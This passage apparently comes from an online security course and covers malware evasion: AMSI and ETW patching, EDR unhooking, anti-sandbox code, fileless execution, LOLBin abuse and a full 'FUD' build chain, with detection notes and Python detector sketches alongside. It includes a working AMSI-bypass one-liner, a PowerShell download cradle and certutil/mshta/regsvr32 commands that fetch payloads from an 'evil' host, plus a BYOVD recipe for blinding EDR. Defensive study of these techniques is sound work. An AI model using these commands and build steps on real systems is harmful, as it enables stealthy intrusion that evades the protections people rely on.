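    """Return (source_pid, target_pid) pairs that completed the chain in order.

    `events` is an iterable of (source_pid, target_pid, api_name) tuples in
    time order (a hypothetical, simplified telemetry format).
    """
    progress = defaultdict(int)  # (src, dst) -> number of chain steps seen so far
    flagged = []
    for src, dst, api in events:
        if src == dst:
            continue  # same-process calls are not cross-process injection
        key = (src, dst)
        step = progress[key]
        if step < len(INJECTION_CHAIN) and api == INJECTION_CHAIN[step]:
            progress[key] = step + 1
            if progress[key] == len(INJECTION_CHAIN):
                flagged.append(key)
    return flagged


telemetry = [
    (4120, 812, "VirtualAllocEx"),
    (2200, 2200, "WriteProcessMemory"),   # self-write, ignored
    (4120, 812, "WriteProcessMemory"),
    (3300, 812, "CreateRemoteThread"),    # different source, chain not complete
    (4120, 812, "CreateRemoteThread"),
]
print(find_injection_pairs(telemetry))  # [(4120, 812)]
```

Debuggers and some accessibility or management tools legitimately perform the same sequence, so in practice the result is filtered against an allowlist of expected source processes.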

Layer 4 — Bypassing Security Products (EDR/AV/AMSI)

Even with encrypted payloads and process injection, modern EDR (Endpoint Detection and Response) instruments the OS at a deep level. Advanced attackers must specifically defeat these monitoring systems.

🛡️ AMSI — Antimalware Scan Interface (and How Attackers Kill It)

AMSI is Microsoft's content scanning pipeline. When PowerShell, .NET, JavaScript, VBScript, or Office VBA executes content, it passes through AMSI before running. AMSI sends the content (even if obfuscated) to the registered AV provider for scanning.

AMSI Pipeline:
PowerShell script → amsi.dll!AmsiScanBuffer() → AV Engine → ALLOW / BLOCK
                                    ↑
                        Attackers patch HERE

Bypass Method 1 — Memory Patching (most common):
1. GetProcAddress(amsi.dll, "AmsiScanBuffer")
2. VirtualProtect(addr, size, PAGE_EXECUTE_READWRITE)
3. Write: MOV EAX, 0x80070057; RET  (= E_INVALIDARG → "scan passed")
   → Every future AmsiScanBuffer() call returns "clean"

Bypass Method 2 — Forcing amsiInitFailed:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
  .GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
→ AMSI thinks initialization failed → all scans skipped

Bypass Method 3 — Unhooking amsi.dll:
Map fresh copy of amsi.dll from disk → overwrite .text section
→ All patches/hooks are removed → clean DLL, no scanning

Defense: Defender for Endpoint monitors AMSI integrity. .NET ETW events log AMSI bypass attempts. Behavioral rule: any process calling VirtualProtect on amsi.dll regions is suspicious.

🪝 EDR Userland Unhooking — Removing the Watcher

EDR products (CrowdStrike, SentinelOne, Defender for Endpoint) inject a DLL into every process that hooks critical API functions in ntdll.dll. When your malware calls NtWriteVirtualMemory, the call first goes through the EDR's hook, which logs it and decides whether to allow or block.

How EDR hooks work:
Normal:   NtWriteVirtualMemory → syscall → kernel
Hooked:   NtWriteVirtualMemory → JMP edr_monitor.dll → log → syscall → kernel

Unhooking Method 1 — Fresh ntdll mapping:
1. MapViewOfFile("C:\Windows\System32\ntdll.dll")  // read clean copy
2. Find .text section in both loaded and clean copies
3. VirtualProtect(loaded_ntdll.text, RWX)
4. memcpy(loaded_ntdll.text, clean_ntdll.text)     // overwrite hooks
→ All EDR hooks REMOVED — calls go directly to kernel

Unhooking Method 2 — Direct syscalls (Syswhispers / Hell's Gate):
Instead of calling ntdll!NtWriteVirtualMemory (which is hooked),
the malware contains its OWN syscall stubs:
  MOV R10, RCX
  MOV EAX, 0x3A        ; syscall number for NtWriteVirtualMemory
  SYSCALL               ; jump directly to kernel — EDR never sees it

Tools that implement this:
• SysWhispers — generates syscall stubs at compile time
• Hell's Gate — resolves syscall numbers dynamically at runtime
• Halo's Gate — handles partially-hooked ntdll scenarios
• RecycledGate / FreshyCalls — variant approaches

Defense: Kernel-level ETW (Event Tracing for Windows) still sees syscalls. Kernel callbacks (PsSetCreateProcessNotifyRoutine, ObRegisterCallbacks) operate at a level malware can't unhook from userland. Modern EDRs combine userland hooks + kernel telemetry for this reason.

📊 ETW Patching — Blinding the Telemetry

ETW (Event Tracing for Windows) is the OS-level logging framework. .NET events, PowerShell script blocks, process creation, network connections — all flow through ETW providers to security tools. Patching ETW makes the process invisible to monitoring.

ETW Patch (disable logging for current process):
1. GetProcAddress(ntdll.dll, "EtwEventWrite")
2. Write: RET (0xC3) at the entry point
   → EtwEventWrite immediately returns → no events logged
   → PowerShell ScriptBlock logging: GONE
   → .NET assembly load events: GONE
   → Process telemetry from this process: GONE

What disappears:
• Microsoft-Windows-PowerShell/Operational log entries
• .NET CLR loading events (Assembly.Load visible normally)
• WMI activity events
• Network connection attribution to this process

Defense: Monitor for ETW provider registration changes. Kernel-mode sensors can detect ETW tampering from outside the patched process (minifilters alone will not, since they filter file-system I/O). Integrity checks on ntdll.dll function prologues detect single-byte patches.
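The prologue integrity check named in the defense note can be sketched as a plain byte comparison. This is a minimal illustration, assuming some other tool has already read the first bytes of the function from process memory and from the on-disk DLL; `check_prologue`, `KNOWN_PATCHES`, and the sample bytes are hypothetical names and values, not part of any EDR product.

```python
from typing import Optional

# Entry-point patches described in this chapter. Illustrative only,
# not an exhaustive signature set.
KNOWN_PATCHES = {
    b"\xc3": "bare RET (function returns immediately)",
    b"\xb8\x57\x00\x07\x80\xc3": "MOV EAX, 0x80070057; RET (forced E_INVALIDARG)",
}

def check_prologue(in_memory: bytes, on_disk: bytes) -> Optional[str]:
    """Return a finding if the in-memory prologue differs from disk, else None."""
    n = min(len(in_memory), len(on_disk))
    if in_memory[:n] == on_disk[:n]:
        return None  # bytes match the clean copy
    for pattern, label in KNOWN_PATCHES.items():
        if in_memory.startswith(pattern):
            return f"patched: {label}"
    # Unknown modification: report where the first difference is
    first_diff = next(i for i in range(n) if in_memory[i] != on_disk[i])
    return f"modified at offset {first_diff}"
```

A scanner would call this for AmsiScanBuffer and EtwEventWrite in each monitored process and alert on any non-None result. Legitimate hot-patching and security-product hooks also change prologues, so a real deployment needs an allowlist.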

Layer 5 — Anti-Sandbox & Anti-Analysis

Security sandboxes (AV emulators, corporate detonation chambers, VirusTotal) run suspicious files in monitored environments. Sophisticated malware fingerprints the environment and refuses to execute if it detects analysis.

🔍 Common Anti-Sandbox / Anti-VM Checks

── Environment Fingerprinting ──

// CPU check — sandboxes often have ≤2 cores
if (GetSystemInfo().dwNumberOfProcessors < 2) ExitProcess(0);

// RAM check — sandboxes often have ≤4GB
MEMORYSTATUSEX mem;
GlobalMemoryStatusEx(&mem);
if (mem.ullTotalPhys < 4ULL * 1024 * 1024 * 1024) ExitProcess(0);

// Uptime check — sandbox VMs are freshly booted
if (GetTickCount64() < 600000) Sleep(600000);  // wait 10 min

// Process count — real systems have 50+ processes
DWORD procs[1024]; EnumProcesses(procs, sizeof(procs), &needed);
if (needed/sizeof(DWORD) < 40) ExitProcess(0);

// Mouse movement — sandboxes don't move the mouse
POINT p1, p2;
GetCursorPos(&p1); Sleep(5000); GetCursorPos(&p2);
if (p1.x == p2.x && p1.y == p2.y) ExitProcess(0);

// Username/hostname check — avoid "sandbox", "virus", "malware"
char name[256]; DWORD sz = 256;
GetComputerNameA(name, &sz);
if (strstr(name, "sandbox") || strstr(name, "virus")) ExitProcess(0);

── Hypervisor / VM Detection ──

// CPUID hypervisor bit (bit 31 of ECX from leaf 1)
__cpuid(regs, 1);
if (regs[2] & (1 << 31)) ExitProcess(0);  // running in VM

// VMware I/O port backdoor
MOV EAX, 'VMXh'; MOV ECX, 0Ah; MOV EDX, 'VX'; IN EAX, DX
// If no exception → running in VMware

// Registry keys — VM guest tools leave traces
RegOpenKey(HKLM, "SOFTWARE\\VMware, Inc.\\VMware Tools", &key);
RegOpenKey(HKLM, "SOFTWARE\\Oracle\\VirtualBox Guest Additions", &key);

── Anti-Debug ──

// Direct API check
if (IsDebuggerPresent()) ExitProcess(0);

// PEB flag (manual check — bypasses API hooks)
BOOL dbg = *(PBYTE)(__readgsqword(0x60) + 2);  // PEB.BeingDebugged

// Timing-based — debug stepping is slow
LARGE_INTEGER t1, t2;
QueryPerformanceCounter(&t1);
// ... some code ...
QueryPerformanceCounter(&t2);
if ((t2.QuadPart - t1.QuadPart) > 10000) ExitProcess(0);

Layer 6 — Fileless Execution & Living Off the Land

The ultimate evasion: never drop a file at all. Use tools already on the victim's machine (LOLBins — Living Off the Land Binaries) and execute entirely from memory, scripts, or built-in OS features.

📂 Fileless Attack Chains

Example 1 — PowerShell Download Cradle (nothing written to disk):
powershell -nop -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://evil/payload.ps1')"
→ Script downloads into memory → executes → loads .NET assembly → injects into explorer.exe
→ Zero files on disk. Zero artifacts in Downloads. Only evidence: PowerShell logs (if enabled).

Example 2 — Macro → WMI Persistence (survives reboot without files):
Sub AutoOpen()
  Set objWMI = GetObject("winmgmts:\\.\root\subscription")
  ' Create WMI event subscription → runs PowerShell on every boot
  ' Payload stored in WMI repository (C:\Windows\System32\wbem\Repository)
  ' No visible file. No scheduled task. No registry run key.
End Sub

Example 3 — Registry-resident payload:
reg add HKCU\Software\Classes\Payload /v data /t REG_BINARY /d <shellcode_hex>
→ Shellcode stored in registry value
→ Loader reads registry → VirtualAlloc → memcpy → CreateThread
→ Payload lives in the registry hive, never as a file

🧰 LOLBins — Legitimate Tools Weaponized

These are signed Microsoft binaries that ship with Windows. They have legitimate functions, but can be abused to download, decode, execute, or proxy malicious payloads. AV rarely blocks them outright because they are trusted OS components; restricting them takes application control policy (WDAC or AppLocker) plus behavioral detection.

LOLBin	Legitimate Purpose	Abuse Technique	MITRE
certutil.exe	Certificate management	`certutil -urlcache -split -f http://evil/payload.exe` — downloads files	T1105
mshta.exe	HTML Application host	`mshta http://evil/payload.hta` — executes arbitrary VBScript/JScript	T1218.005
rundll32.exe	Execute DLL functions	`rundll32 javascript:"\..\mshtml,RunHTMLApplication";` + WSH script	T1218.011
regsvr32.exe	Register COM objects	`regsvr32 /s /n /u /i:http://evil/payload.sct scrobj.dll` — Squiblydoo attack	T1218.010
msbuild.exe	.NET Build tool	Build a .csproj with inline C# task → compile + execute arbitrary code	T1127.001
bitsadmin.exe	Background file transfer	`bitsadmin /transfer job /download http://evil/payload.exe`	T1197
wmic.exe	WMI management	`wmic process call create "powershell -enc <base64>"`	T1047
cmstp.exe	Connection Manager installer	Provide malicious .inf file → executes arbitrary commands, bypasses UAC	T1218.003

Detection: Sigma rules flagging unusual parent-child process chains (e.g., WINWORD.EXE → mshta.exe). Behavioral baselines — certutil making HTTP requests, msbuild executing outside of developer systems. LOLBAS project (lolbas-project.github.io) catalogs all known techniques.
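The parent-child rule in the detection note can be sketched in a few lines. This is a simplified illustration rather than a real Sigma rule: the event dictionaries and their `parent_image` / `image` keys are assumed field names (loosely modeled on process-creation logs), and both name sets are examples, not a complete list.

```python
# Example sets only; tune both to the environment being monitored.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_CHILDREN = {
    "mshta.exe", "powershell.exe", "cmd.exe", "certutil.exe",
    "regsvr32.exe", "rundll32.exe", "wmic.exe", "bitsadmin.exe",
}

def flag_suspicious_spawns(events):
    """Yield process-creation events where an Office app started a LOLBin."""
    for ev in events:
        # Compare on the file name only, case-insensitively
        parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
        child = ev["image"].rsplit("\\", 1)[-1].lower()
        if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
            yield ev
```

Matching on the parent-child pair rather than on the LOLBin alone keeps the false-positive rate manageable, since administrators run certutil and PowerShell legitimately but Word almost never needs to.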

Layer 7 — Advanced Stealth (Sleep, Signing, Entropy)

The final layers that separate amateur RATs from nation-state implants.

😴 Sleep Obfuscation (Ekko / Foliage)

C2 implants spend 99% of their time sleeping between check-ins. During sleep, the shellcode sits in readable memory — perfect for memory scanners. Sleep obfuscation encrypts the beacon's memory during sleep and decrypts only when it wakes up to check in.

Ekko Sleep Obfuscation:
1. Create timer queue (ROP chain using NtContinue)
2. Set timer callback: VirtualProtect(beacon, RW)
3. Set timer callback: SystemFunction032(beacon, key) // RC4 encrypt
4. Set timer callback: Sleep(60000)                    // 60s sleep
5. Set timer callback: SystemFunction032(beacon, key) // RC4 decrypt
6. Set timer callback: VirtualProtect(beacon, RX)
7. Queue all timers → beacon memory ENCRYPTED during sleep
→ Memory scan during sleep sees: encrypted garbage
→ Memory scan when awake: 0.5s window to catch it

Detection: Detect repeated RX → RW → RX protection flips on the same memory region. Scan for timer queue chains with suspicious callbacks. Thread stack analysis for NtContinue ROP gadgets.

📜 Code Signing Abuse

Windows SmartScreen and AV reputation engines trust signed binaries. Attackers exploit this trust through:

Stolen certificates — Purchasing or stealing code signing certs from compromised companies. Stuxnet used two stolen Realtek/JMicron certificates.
EV certificate purchase — $300-$500 through resellers with fake company documents. Extended Validation certs get instant SmartScreen trust.
Expired cert signing — Some signing tools allow timestamped signing with expired certs that still verify.
Signature side-loading — Embed malicious code in a signed binary's resource section or append it after the authenticode signature (signature still validates).

Detection: Certificate reputation checks. Flag newly issued certs. Check for known stolen cert serial numbers (Stuxnet: Realtek 01 00 00 00 00 01 1E 3B 4E).

📊 Entropy Management

Encrypted/packed payloads have high entropy (~7.9/8.0). Security tools flag this. Attackers reduce entropy to look like normal executables (~5.0-6.5):

English text padding — Append paragraphs of Lorem Ipsum or Wikipedia text to the resource section
Steganography — Hide encrypted payload inside BMP/PNG image pixel data (low-entropy carrier)
XOR key cycling — Use keys that produce ASCII-range output instead of random bytes
Encoding instead of encryption — Base64 output is capped at 6.0 bits per byte (64-symbol alphabet), and custom encoding schemes can go lower

Detection: Per-section entropy analysis (not whole-file). Detect large resource sections with English text + code sections with high entropy = suspicious combination.
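Per-section entropy analysis comes down to computing Shannon entropy over each section's bytes. The sketch below assumes the sections have already been extracted into a name-to-bytes mapping by a PE parser; `flag_sections` and the 7.2 threshold are illustrative assumptions, not values taken from any product.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 = constant, 8.0 = uniform random)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in Counter(data).values())

def flag_sections(sections: dict, threshold: float = 7.2) -> list:
    """Return names of sections whose entropy meets the (assumed) threshold."""
    return [name for name, blob in sections.items()
            if shannon_entropy(blob) >= threshold]
```

Scoring each section separately matters because low-entropy padding in one section lowers the whole-file average while leaving the encrypted section itself just as conspicuous.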

⏰ Timestomping & Log Evasion

After landing on a system, attackers cover their tracks:

Timestomping — Modify file Created/Modified/Accessed timestamps to match legitimate system files (SetFileTime() or NtSetInformationFile). A dropped malware.exe gets timestamps from 2019 to blend with surrounding files. T1070.006
Event log clearing — wevtutil cl Security or Clear-EventLog. Nukes the Security event log. Ironic: clearing the log generates Event ID 1102 (log was cleared). T1070.001
Sysmon evasion — Unload the Sysmon driver, or modify its config to exclude the attacker's processes. Direct syscalls do not help here: Sysmon collects from a kernel driver rather than from userland hooks, so the operation is still seen.
C2 traffic blending — Domain fronting (route C2 through legitimate CDNs like Cloudflare/AWS), DNS-over-HTTPS C2, or abuse legitimate services (Slack webhooks, Teams, Discord, Google Sheets as C2). T1090.004

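Detection: Each $MFT (Master File Table) record keeps a second set of timestamps in its $FILE_NAME attribute, which SetFileTime() does not update, so a mismatch with the modified $STANDARD_INFORMATION (MACE) timestamps exposes tampering. Centralized SIEM: logs forwarded in real time can't be retroactively deleted from the SIEM. Event ID 1102 alerts. JA3 fingerprinting of C2 traffic.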
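NTFS stores creation times in two attributes of each MFT record: $STANDARD_INFORMATION (what SetFileTime() changes) and $FILE_NAME (normally updated only by the file system). Two common forensic heuristics compare them. The sketch assumes an MFT parser has already produced both values as `datetime` objects; `timestomp_indicators` is a hypothetical helper name.

```python
from datetime import datetime

def timestomp_indicators(si_created: datetime, fn_created: datetime) -> list:
    """Return heuristic findings for one file's creation timestamps."""
    findings = []
    # A file should not appear older in $SI than in $FN
    if si_created < fn_created:
        findings.append("$STANDARD_INFORMATION creation predates $FILE_NAME creation")
    # Hand-set timestamps are often whole seconds; NTFS records 100 ns ticks
    if si_created.microsecond == 0:
        findings.append("creation time has zero sub-second precision")
    return findings
```

Both heuristics produce false positives (archive extraction and some copy tools also set whole-second or older timestamps), so they work best as triage signals feeding a timeline review.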

Putting It All Together — A Real FUD Build Chain

Here's how a real-world attacker combines every layer into one delivery:

🔗 Full FUD Delivery Chain (Educational Walkthrough)

STEP 1 — Build the payload
Tool: Custom RAT / Cobalt Strike / Sliver C2 framework
Output: beacon.exe (detected by 58/72 AV engines — completely burned)

STEP 2 — Encrypt with crypter (static evasion)
Tool: Private crypter (native C stub + AES-256)
Process: beacon.exe → AES encrypt → embed in stub → output.exe
Result: 12/72 detections (heuristics still flag it — stub pattern known)

STEP 3 — Add process injection (runtime evasion)
Stub modified: decrypt in memory → process hollow into RuntimeBroker.exe
Result: 3/72 detections (behavioral heuristics on injection pattern)

STEP 4 — Anti-sandbox + anti-debug
Add: CPU cores check, RAM check, 10-min sleep delay, mouse movement check
Result: 1/72 detections (one ML engine still suspicious of PE structure)

STEP 5 — Entropy reduction + signing
Pad resource section with legitimate strings, sign with purchased EV cert
Result: 0/72 detections — FUD achieved

STEP 6 — Embed in delivery vehicle
Option A: Pack into ISO/IMG → attach to spearphishing email (bypasses MotW)
Option B: Embed in PDF via /Launch or /OpenAction JavaScript
Option C: Host on compromised website → drive-by download
Option D: Side-load via legitimate signed application (DLL hijacking)

STEP 7 — Post-exploitation stealth
- AMSI patch (PowerShell now unmonitored)
- ETW patch (telemetry disabled for this process)
- Sleep encryption (Ekko — encrypted during 60s sleep cycles)
- Timestomp dropped files to match explorer.exe dates
- C2 over DNS-over-HTTPS to Cloudflare (looks like ordinary HTTPS traffic)

TOTAL EVASION LAYERS: 7 stacked techniques
COMBINED COST: ~$500-2000 (crypter + cert + C2 infra)
FUD LIFESPAN: 1-3 days before cloud telemetry catches it

🛡️ How Defenders Win Despite All This

Every evasion technique above has detection opportunities. The key insight: attackers can't evade every layer simultaneously.

Behavioral detection catches what signatures miss — even a FUD binary must eventually call VirtualAlloc → WriteProcessMemory → CreateRemoteThread. EDR sees the behavior, not the bytes.

Network detection catches what endpoint evasion misses — the C2 beacon must communicate. Even DNS-over-HTTPS C2 creates detectable traffic patterns (periodic intervals, fixed packet sizes).

Kernel telemetry catches what userland unhooking misses — kernel callbacks and ETW at the kernel level still report process creation, thread injection, and memory allocation even when ntdll hooks are removed.

Memory forensics catches what sleep obfuscation misses — periodic memory scans have a statistical chance of catching the beacon during its brief awake window. Repeated RX → RW → RX protection flips on the same region are suspicious in themselves.
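The "periodic intervals" pattern mentioned under network detection can be measured with the coefficient of variation of the gaps between connections: near zero means clockwork regularity. This is a minimal sketch assuming connection timestamps (in seconds) for one host-destination pair have already been pulled from flow logs; the function names and the 0.1 threshold are illustrative assumptions.

```python
from statistics import mean, pstdev

def beacon_score(timestamps, min_events: int = 6):
    """Coefficient of variation of inter-arrival gaps; None if too few events."""
    if len(timestamps) < min_events:
        return None
    ordered = sorted(timestamps)
    gaps = [b - a for a, b in zip(ordered, ordered[1:])]
    avg = mean(gaps)
    if avg == 0:
        return None
    return pstdev(gaps) / avg

def looks_like_beacon(timestamps, max_cv: float = 0.1) -> bool:
    """True when the connection timing is regular enough to warrant review."""
    score = beacon_score(timestamps)
    return score is not None and score <= max_cv
```

Implants that add jitter push the score above a tight threshold, so production detections usually combine timing with payload-size uniformity and destination rarity rather than relying on timing alone.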

This is an arms race — and defenders have the advantage of breadth. An attacker must defeat every defense. A defender only needs to catch the attacker once.

// 10 — Bypassing Modern Security ⏱ 18 min · Advanced

How Attackers Defeat Modern Defenses

Chapter 09 covered classic evasion — packers, crypters, process injection. But modern security infrastructure has evolved far beyond signature-based AV. Today's defenders deploy AI/ML models, cloud-detonation sandboxes, Extended Detection & Response (XDR), hardware-enforced security, and Zero Trust architectures. This chapter shows how the attacker side has evolved to match — and how each new defense creates a new bypass technique in an endless arms race.

⚠️ Educational Context Only

This section documents publicly known bypass techniques from security research papers, conference talks (DEF CON, Black Hat), and vendor advisories. Understanding how modern defenses are circumvented is essential for building resilient security architectures. All techniques described here have published mitigations.

Next-Gen Antivirus: How It Actually Works

Traditional AV matched file hashes and byte patterns. Next-Gen AV (NGAV) from vendors like CrowdStrike, SentinelOne, Cylance, and Microsoft Defender for Endpoint uses a multi-layered approach:

The 5-Layer NGAV Engine

① Static ML Model

Before execution. Trained on millions of PE features — import tables, section entropy, string patterns, header anomalies, compiler artifacts. Makes a malicious/benign prediction in <50ms. No signatures needed — classifies never-before-seen files.

Bypass: Adversarial ML — modify PE features (append benign strings, pad sections to lower entropy, add fake imports) to shift the model's decision boundary. Tools: MalGAN, EMBER adversarial.

② Behavioral Analysis

During execution. Monitors API call sequences, memory operations, file system changes, registry modifications, network connections. Builds a behavioral graph and compares against known attack patterns.

Bypass: API call unhooking (Ch 09), indirect syscalls, delayed execution, interleaving malicious calls with benign API noise to dilute the behavioral signal.

③ Cloud Lookup

File hash + metadata sent to vendor cloud in real-time. Cloud has access to global threat intelligence, shared IOCs, and heavier ML models too expensive to run locally. Can reclassify files retroactively after new intelligence arrives.

Bypass: Block outbound connections to AV cloud endpoints (e.g., *.wdcp.microsoft.com), use antiscan services instead of VirusTotal (which shares with vendors), ensure no prior submission of sample.

④ Cloud Sandbox Detonation

Suspicious files uploaded and executed in the vendor's cloud sandbox (Azure for Defender, CrowdStrike's Falcon Sandbox). Runs for 30-120 seconds, captures all behaviors, produces a verdict. More thorough than local analysis.

Bypass: Anti-sandbox evasion (Ch 09 Layer 5), execution delays >120s, environment-keying (only execute if %USERDOMAIN% matches target), human interaction gates (require mouse clicks to proceed).

⑤ Memory Scanning / AMSI

Scans content at runtime — PowerShell scripts, .NET assemblies, VBScript, JScript, even unpacked payloads in memory. AMSI hooks into script engines and provides the AV engine with the decoded content, defeating obfuscation.

Bypass: AMSI patching (Ch 09 Layer 4), hardware breakpoint hooking of AmsiScanBuffer, CLR profiler-based bypass, or avoiding managed runtimes entirely (use native C/C++ payloads).

Evading AI/ML Detection Models

ML models are the backbone of modern NGAV, but they have fundamental weaknesses that attackers exploit systematically:

Adversarial Feature Manipulation

ML models classify files based on extracted features. If you know (or can guess) which features the model uses, you can manipulate them without changing the payload's functionality.

Feature Manipulation Techniques

// Problem: ML flags high entropy in .text section
Fix: Insert dead code (junk functions that are never called)
     Entropy drops from 7.8 → 6.2 (below suspicion threshold)

// Problem: ML flags small import table
Fix: Add fake imports that are never used:
     LoadLibraryA("gdiplus.dll")  // GUI library - looks normal
     GetProcAddress("GdipDrawLine") // never called
     Import count: 6 → 42 (matches legitimate software)

// Problem: ML flags embedded strings ("shellcode", "inject")
Fix: Compile-time string encryption (XOR/AES)
     Strings only exist decrypted in memory at runtime
     Static ML never sees them

// Problem: ML flags abnormal PE section names
Fix: Use standard names: .text, .rdata, .data, .rsrc
     Never use custom names like .crypt, .pack, .vmp

Model Profiling & Evasion-as-a-Service

Sophisticated attackers profile the target's specific AV/ML model before deployment:

ML Evasion Workflow

Step 1: Identify Target AV
  Recon: job postings mention "CrowdStrike"
  Or: phishing lure returns Defender-specific error

Step 2: Set Up Local Copy of Target AV
  Install same product + version in test VM
  Enable cloud features (use burner license)

Step 3: Iterative Testing
  Submit payload → observe detection → modify → resubmit
  Automated via: DefenderCheck, ThreatCheck
  These tools binary-search the file to find
  the EXACT byte range triggering detection

Step 4: Feature Perturbation
  Modify only the flagged features
  Re-test until 0 detections locally
  Test against antiscan.me (doesn't share with vendors)

Step 5: Deploy
  FUD window: typically 24-72 hours
  Before vendor cloud updates models with new sample

EDR → XDR: The Detection Evolution

EDR watches endpoints. XDR (Extended Detection & Response) correlates signals across endpoints, network, email, cloud, and identity — making evasion exponentially harder because attackers must be invisible across every data source simultaneously.

XDR Correlation — Why Single-Layer Evasion Fails

XDR Cross-Signal Detection

ENDPOINT signal: svchost.exe (PID 7284) → RWX allocation + beacon behavior
  Alone: Low confidence (svchost does allocate memory legitimately)

NETWORK signal: svchost.exe → HTTPS to cdn-update.azureedge[.]net every 60s
  Alone: Low confidence (legitimate Azure CDN traffic exists)

EMAIL signal: User received .docm attachment 4 minutes before svchost anomaly
  Alone: Low confidence (user receives documents daily)

IDENTITY signal: Same user attempted 3 failed logins to DC01 after svchost spawn
  Alone: Low confidence (password typos happen)

☆ XDR CORRELATION: Email(malicious attachment) → Endpoint(process injection)
  → Network(C2 beacon) → Identity(lateral movement attempt)
  COMBINED CONFIDENCE: 99.7% — automatic containment triggered
  Actions: Isolate host, disable user account, block C2 domain
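One simple way to see why four weak signals add up to a strong one is a naive-Bayes style combination, where each signal multiplies the odds of compromise by a likelihood ratio. The sketch below is an illustration only: it assumes the signals are conditionally independent, and the prior and ratios in the usage note are invented numbers that do not reproduce any vendor's scoring.

```python
import math

def combine_signals(prior: float, likelihood_ratios: list) -> float:
    """Posterior probability after applying independent likelihood ratios."""
    # Work in log-odds so the ratios add instead of multiply
    log_odds = math.log(prior / (1 - prior))
    for lr in likelihood_ratios:
        log_odds += math.log(lr)
    return 1 / (1 + math.exp(-log_odds))
```

With a hypothetical prior of 0.001 and ratios of 20, 15, 25, and 30 for the endpoint, network, email, and identity signals, any single signal leaves the posterior under 5%, while all four together push it above 99%.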

How Attackers Try to Beat XDR

Living-off-the-Land (LOL): Use only built-in OS tools (certutil, mshta, PowerShell) so endpoint signals blend with normal admin activity.

C2 over legitimate services: Abuse Slack, Discord, OneDrive, Google Sheets as C2 channels — network traffic goes to trusted domains.

Credential harvesting before lateral movement: Dump credentials from memory (Mimikatz-style) and use legitimate RDP/WinRM with real creds — identity layer sees "valid" authentication.

Slow & low: Operate over days/weeks at very low volume. XDR correlation windows are typically 24-48 hours — if attack stages span weeks, they may not correlate.

Why XDR Still Wins (Usually)

Retroactive correlation: When a new IOC is discovered, XDR searches historical telemetry (30-90 days) — activities that seemed benign at the time are re-evaluated.

UEBA (User Behavior Analytics): ML baselines each user's normal patterns. Even with valid credentials, unusual access times, abnormal file access patterns, or first-time connections trigger anomaly alerts.

Automated response: XDR can isolate a host in <30 seconds — faster than any human attacker can pivot. Even if the attacker evades detection on 3 layers, correlation with the 4th triggers containment.

Hardware-Enforced Security

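Modern CPUs and operating systems now enforce security at the hardware level. Because the policy is enforced below the OS, userland malware cannot simply patch these protections out; the bypass attempts listed under each one rely on separate vulnerabilities or misconfiguration.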

HVCI — Hypervisor-Protected Code Integrity

Windows runs a tiny hypervisor (VBS — Virtualization-Based Security) beneath the OS. The kernel itself runs in a virtual machine. HVCI ensures every driver and kernel module is signed — even a kernel exploit cannot load unsigned code because the hypervisor enforces the policy from a higher privilege level.

Impact: Rootkits and unsigned kernel drivers are blocked even with admin/SYSTEM access. Attackers need a hypervisor escape (extremely rare).

Bypass attempts: Disable VBS via boot config (requires physical access + admin), exploit vulnerable signed drivers (BYOVD — Bring Your Own Vulnerable Driver), hypervisor escape (0-day class).

CET — Control-flow Enforcement Technology

Intel CET adds a hardware shadow stack that mirrors the software call stack. On every RET instruction, the CPU checks if the return address matches the shadow stack. If they differ (buffer overflow modified the return address), the CPU raises a #CP exception — the exploit fails at the hardware level.

Impact: Classic stack buffer overflow → ROP chain exploits are dead on CET-enabled systems. EIP/RIP hijacking via stack smash no longer works.

Bypass attempts: JIT spray (corrupt JIT-compiled code regions), data-only attacks (corrupt data structures, not code flow), exploit non-CET processes (legacy 32-bit apps).

Secure Boot + TPM 2.0

Secure Boot verifies every component in the boot chain — firmware → bootloader → kernel → drivers — using cryptographic signatures. TPM (Trusted Platform Module) stores measurements of each boot component. If any component is modified (bootkit), the chain breaks and the system won't boot or reports tampered state to remote attestation servers.

Impact: Bootkits (MBR/VBR/UEFI rootkits) that persist below the OS are blocked. BlackLotus (2023) was the first known UEFI bootkit to bypass Secure Boot in the wild.

Bypass: CVE-2022-21894 (BlackLotus exploited a Secure Boot vulnerability). Microsoft revoked the vulnerable bootloader but rollout is slow — many systems remain vulnerable as of 2024.

BYOVD — Bring Your Own Vulnerable Driver

When HVCI blocks unsigned drivers, attackers bring a legitimately signed but vulnerable driver (e.g., old GPU drivers, anticheat modules, hardware utilities) and exploit its vulnerability to gain kernel code execution. The driver passes signature checks because it is genuinely signed — it's just buggy.

BYOVD Attack Flow — MITRE T1068

1. Drop signed vulnerable driver: RTCore64.sys (MSI Afterburner)
2. Load via sc.exe create — passes HVCI signature check ✓
3. Exploit CVE-2019-16098 (arbitrary memory R/W in driver)
4. Use kernel R/W to disable EDR kernel callbacks
5. Remove PsSetCreateProcessNotifyRoutine entries
6. EDR is now fully blinded — kernel telemetry gone

Known abused drivers: RTCore64.sys, dbutil_2_3.sys (Dell),
  gdrv.sys (Gigabyte), ene.sys (ENE Technology), cpuz141.sys
Microsoft maintains a blocklist but it's perpetually incomplete.

Zero Trust Architecture — The Network Evolution

Traditional networks have a perimeter (firewall) — once inside, assets trust each other. Zero Trust assumes every request is potentially malicious, regardless of source. This fundamentally changes the attacker's playbook:

Zero Trust Principles vs. Attacker Impact

Zero Trust Principle	What It Blocks	Attacker Workaround
Verify explicitly — authenticate every request with MFA + device health + location + risk score	Stolen credentials alone are insufficient. Even with valid AD creds, MFA + device compliance check blocks lateral movement.	MFA fatigue attacks (push spam), SIM swapping, adversary-in-the-middle (AiTM) phishing proxies like `Evilginx2` that capture session tokens post-MFA.
Least-privilege access — users/services get minimum required permissions, just-in-time access only	Compromised accounts can reach only what they're explicitly authorized. No "Domain Admin" always-on access.	Target JIT approval workflows. Social engineer the approver. Abuse legitimate access to escalate via misconfigurations (Azure AD role abuse, delegation attacks).
